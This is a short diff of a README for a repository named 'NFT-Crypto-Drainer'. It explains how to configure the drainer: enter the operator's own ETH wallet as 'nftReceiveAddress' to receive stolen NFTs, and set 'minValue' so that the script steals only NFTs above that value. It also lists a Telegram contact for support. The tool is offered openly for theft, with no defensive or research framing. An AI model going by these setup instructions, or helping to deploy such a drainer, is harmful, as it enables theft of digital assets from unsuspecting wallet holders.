xxxKEKxxx/NFT-Crypto-Drainer/README.md

 - Edit lines : nftReceiveAddress: "YOUR WALLET", replace YOUR WALLET with your ETH wallet address.
 - Line "minValue: 0.2," is the minimum value of a NFT before it gets stolen.
 Exemple : If you change this value to 1, the script will only steal NFTs that have a value higher to 1.

-To get instant support, contact me on my [Telegram](https://t.me/zentoh)
+To get instant support, contact me on [Telegram](https://t.me/zentoh)

 # 👻 Why it doesn't show my address?